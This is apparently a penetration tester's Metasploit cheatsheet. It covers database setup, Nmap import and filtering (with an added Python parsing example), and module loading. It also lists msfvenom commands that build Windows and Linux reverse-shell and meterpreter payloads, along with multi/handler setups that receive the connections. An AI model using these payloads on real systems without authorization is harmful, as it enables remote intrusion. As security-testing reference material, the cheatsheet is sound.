Metasploit cheatsheet
In this page, you will find notes that I have made for Metasploit.
Database and Report Management: The commands involving xsltproc, hosts, services, and db_connect are used for managing databases and reports in Metasploit. They convert scan reports, filter stored data, display details of specific services, and connect the console to a database.
Payload Generation: msfvenom creates payloads for different platforms (Windows, Linux) that connect back to a listener, which is how a penetration tester keeps a session on a compromised machine.
Exploitation and Handlers: use exploit and set PAYLOAD load a specific exploit and configure the payload handler. The handler listens for the incoming connection from the target, giving the tester a session on the affected machine.
Auxiliary and Module Loading: use auxiliary/scanner and reload_all cover tasks such as port scanning and loading or reloading modules in Metasploit.
Metasploit database
To create a database in Metasploit:
sudo service postgresql start
sudo msfdb init
sudo msfconsole
// inside msfconsole: check the connection, then list or add workspaces
db_status
workspace -h
workspace -a <workspace_name>
Useful database commands in Metasploit
db_export -f xml database.xml
db_import PATH/NMAP.xml
db_connect
db_import
db_status
db_nmap
db_stats
// display the hosts db column options
hosts -h
// filter on hosts columns and show only the selected fields (no space after the comma, or the second name is parsed as a separate argument)
hosts -c address,os_flavor
// display the listed columns and show only hosts matching Linux
hosts -c address,os_flavor -S Linux
Nmap inside Metasploit database
db_nmap -sS -sV -A [IP]
// db_nmap takes the usual Nmap flags (-sP for host discovery only); results are stored in the current workspace
Copy a new Ruby exploit into Metasploit
cp exploit.rb /usr/share/metasploit-framework/modules/exploits/multi/http/
// then, inside msfconsole, reload the module tree:
reload_all
Post exploitation Metasploit commands
XSLT Processing for Nmap Reports: Convert XML scan results to HTML to enhance readability using browsers.
xsltproc -o ~/scanresults.html /usr/share/nmap/nmap.xsl scan.xml
Metasploit Database Management: Utilize useful database commands for handling Metasploit databases. Customize your queries by selecting specific columns and applying filters.
hosts -c address,os_flavor -S Linux
services -c name,info -S http
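The hosts and services tables above are populated from imported Nmap XML (db_import) and then queried with -c (columns) and -S (search term). The following added example is not part of the original cheatsheet or of Metasploit itself: it parses a constructed Nmap XML document into host and service records and reproduces the two console filters in Python, so the effect of -c and -S is visible without a database. The os_flavor field is filled from Nmap's osfamily here as an approximation.

```python
import xml.etree.ElementTree as ET

# Constructed Nmap XML in the format db_import and xsltproc consume; not a real scan.
SAMPLE_NMAP_XML = """<nmaprun scanner="nmap">
<host><status state="up"/><address addr="10.0.0.5" addrtype="ipv4"/><ports>
<port protocol="tcp" portid="22"><state state="open"/><service name="ssh" product="OpenSSH" version="8.9p1"/></port>
<port protocol="tcp" portid="80"><state state="open"/><service name="http" product="nginx" version="1.18.0"/></port>
</ports><os><osmatch name="Linux 5.4"><osclass osfamily="Linux"/></osmatch></os></host>
<host><status state="up"/><address addr="10.0.0.9" addrtype="ipv4"/><ports>
<port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
<port protocol="tcp" portid="8080"><state state="filtered"/><service name="http-proxy"/></port>
</ports><os><osmatch name="Windows 10"><osclass osfamily="Windows"/></osmatch></os></host>
</nmaprun>"""


def parse_nmap_xml(xml_text):
    """Build host and service records shaped like Metasploit's hosts/services tables."""
    root = ET.fromstring(xml_text)
    hosts, services = [], []
    for host in root.iter("host"):
        addr_el = host.find("address[@addrtype='ipv4']")
        if addr_el is None:  # skip hosts without an IPv4 address
            continue
        addr = addr_el.get("addr")
        osclass = host.find("os/osmatch/osclass")  # os_flavor approximated by osfamily
        hosts.append({"address": addr,
                      "os_flavor": osclass.get("osfamily", "") if osclass is not None else ""})
        for port in host.iter("port"):
            svc = port.find("service")
            product = svc.get("product", "") if svc is not None else ""
            version = svc.get("version", "") if svc is not None else ""
            services.append({"host": addr, "port": int(port.get("portid")),
                             "proto": port.get("protocol"), "state": port.find("state").get("state"),
                             "name": svc.get("name", "") if svc is not None else "",
                             "info": " ".join(v for v in (product, version) if v)})
    return hosts, services


def search(records, columns, term):
    """Mimic `-c col1,col2 -S term`: keep rows where any field contains the term
    (case-insensitive), then project the rows onto the requested columns."""
    term = term.lower()
    return [{c: r[c] for c in columns} for r in records
            if any(term in str(v).lower() for v in r.values())]


if __name__ == "__main__":
    hosts, services = parse_nmap_xml(SAMPLE_NMAP_XML)
    print(search(hosts, ["address", "os_flavor"], "Linux"))  # hosts -c address,os_flavor -S Linux
    print(search(services, ["name", "info"], "http"))  # services -c name,info -S http
```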
Port Scanning and Service Enumeration: Use the auxiliary scanner to perform TCP port scans and filter out relevant services, such as HTTP.
use auxiliary/scanner/portscan/tcp
Payload Generation with msfvenom: Create payloads for Windows, including reverse shells and meterpreter shells.
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.111.17 LPORT=443 -f c -a x86 --platform windows -b '\x00'
Launching Exploits and Handlers: Quickly set up and execute handlers and exploits in Metasploit using concise commands.
msfconsole -q -x "use exploit/multi/handler; set payload windows/shell/reverse_tcp; set LHOST <LocalIp>; set LPORT 4444; exploit"
Start a handler to receive a reverse shell (one command per line inside msfconsole):
use exploit/multi/handler
set PAYLOAD linux/x64/meterpreter/reverse_tcp
set LHOST 10.1.1.96
set LPORT 443
run
Create an ELF payload that connects back to the handler:
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.1.1.96 LPORT=443 -f elf -o bad.elf
Database Connection in Metasploit: Connect to a specific Metasploit database using configuration files or direct connection strings.
msf > db_connect -y /opt/metasploit/config/database.yml
msf > db_connect your_msfdb_user:your_msfdb_pswd@127.0.0.1:5432/msf_database
Troubleshooting Database Issues: Resolve common database connection problems in Metasploit by ensuring necessary drivers are installed and reconfiguring as needed.
sudo apt-get install libpq-dev
sudo msfconsole --quiet -x "db_status; exit;"